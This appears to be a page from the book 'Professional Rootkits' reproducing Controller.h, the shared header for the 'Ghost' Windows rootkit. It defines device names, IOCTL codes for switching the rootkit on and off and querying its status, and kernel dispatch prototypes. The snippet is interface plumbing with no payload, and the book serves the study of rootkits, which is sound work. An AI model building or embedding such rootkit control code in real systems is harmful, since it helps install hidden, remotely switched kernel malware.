IoManager.h

Previous page
Table of content
Next page

The file Controller.h provides the definitions required by both the rootkit and the controller. To separate more than one use for a single file, a keyword defined elsewhere, _GHOST_ROOTKIT_, is used. The rootkit must define this keyword, while the controller must not. This allows the rootkit and the controller to share I/O communication definitions without requiring the controller to know anything about the internal structure of the rootkit:

  // Copyright Ric Vieler, 2006 // Definitions for Ghost IO control #ifndef _GHOST_IO_H_ #define _GHOST_IO_H_ // Use CreateFile( GHOST_DEVICE_OPEN_NAME,,, externally // Use GHOST_DEVICE_CREATE_NAME internally to create device // Use GHOST_DEVICE_LINK_NAME internally to create device link #define GHOST_DEVICE_CREATE_NAME L"\\Device\\MyDeviceDriver" #define GHOST_DEVICE_LINK_NAME L"\\DosDevices\\MyDeviceDriver" #define GHOST_DEVICE_OPEN_NAME "\\\\.\\MyDeviceDriver" // Set command = GHOST_ON or GHOST_OFF for GHOST_ON_OFF_COMMAND // Get command = GHOST_ON or GHOST_OFF for GHOST_STATUS_COMMAND typedef struct {  Int    command; } GHOST_IOCTLDATA; // definitions from ntddk.h // (these won't be defined in user mode apps) #ifndef CTL_CODE #define CTL_CODE( DeviceType, Function, Method, Access ) (                 \     ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \ ) #endif #ifndef FILE_DEVICE_UNKNOWN #define FILE_DEVICE_UNKNOWN 0x00000022 #endif #ifndef METHOD_BUFFERED #define METHOD_BUFFERED 0 #endif #ifndef FILE_ANY_ACCESS #define FILE_ANY_ACCESS 0 #endif // Use these to command the rootkit! #define GHOST_ON_OFF_COMMAND CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS) #define GHOST_STATUS_COMMAND CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) #define GHOST_OFF 0 #define GHOST_ON 1 // Internal functions #ifdef _GHOST_ROOTKIT_ NTSTATUS  OnDeviceControl( PFILE_OBJECT FileObject, BOOLEAN Wait,  PVOID InputBuffer, ULONG InputBufferLength,  PVOID OutputBuffer, ULONG OutputBufferLength,  ULONG IoControlCode, PIO_STATUS_BLOCK IoStatus,  PDEVICE_OBJECT DeviceObject ); NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp ); #endif #endif



Previous page
Table of content
Next page
Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler
BUY ON AMAZON
Microsoft Windows Server 2003(c) TCP/IP Protocols and Services (c) Technical Reference
C & Data Structures (Charles River Media Computer Engineering)
Oracle SQL*Plus: The Definitive Guide (Definitive Guides)
The Lean Six Sigma Pocket Toolbook. A Quick Reference Guide to Nearly 100 Tools for Improving Process Quality, Speed, and Complexity
Microsoft Visual Basic .NET Programmers Cookbook (Pro-Developer)
User Interfaces in C#: Windows Forms and Custom Controls
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy